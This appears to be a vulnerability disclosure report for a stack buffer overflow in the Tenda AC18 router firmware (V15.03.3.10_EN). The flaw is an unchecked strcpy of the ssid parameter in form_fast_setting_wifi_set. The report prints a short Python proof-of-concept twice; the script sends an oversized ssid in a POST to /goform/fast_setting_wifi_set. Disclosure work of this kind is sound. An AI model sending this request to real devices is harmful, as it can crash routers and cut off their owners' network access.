Tenda AC18 V15.03.3.10_EN
Tenda AC18 V15.03.3.10_EN
The Tenda AC18 V15.03.3.10_EN has a stack overflow vulnerability located in the form_fast_setting_wifi_set function.The src variable receives the ssid parameter from a POST request and is later assigned to the s and dest variable. However, since the user has control over the input of ssid, the statement strcpy(s, src); and strcpy(dest, src); leads to a buffer overflow. There is no size check, so the user-provided ssid can exceed the allocated size of the s array and dest array, thus triggering this security vulnerability. The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data. dadian1
# form_fast_setting_wifi_set
import requests
ip = '192.168.0.100:80'
url = f"http://{ip}/goform/fast_setting_wifi_set"
data = {"ssid":'a'*0x100}
ret = requests.post(url, data)
###Product_version
Tenda AC18
V15.03.3.10_EN
###Affected_component
the "form_fast_setting_wifi_set" function of /bin/httpd; /bin/httpd
###Attack_vector
use a simple exp to attack, like this:
#python3
import requests
ip = '192.168.0.100:80'
url = f"http://{ip}/goform/fast_setting_wifi_set"
data = {"ssid":'a'*0x100}
ret = requests.post(url, data)
###Discription
Tenda AC18 V15.03.3.10_EN was discovered to contain a stack-based buffer overflow vulnerability via the ssid parameter at ip/goform/fast_setting_wifi_set.
###Refernce
<https://palm-vertebra-fe9.notion.site/form_fast_setting_wifi_set-fd47294cf4bb460bb95f804d39e53f34>
<https://www.tendacn.com/hk/download/detail-3863.html>
<https://www.tendacn.com/hk/download/detail-3852.html>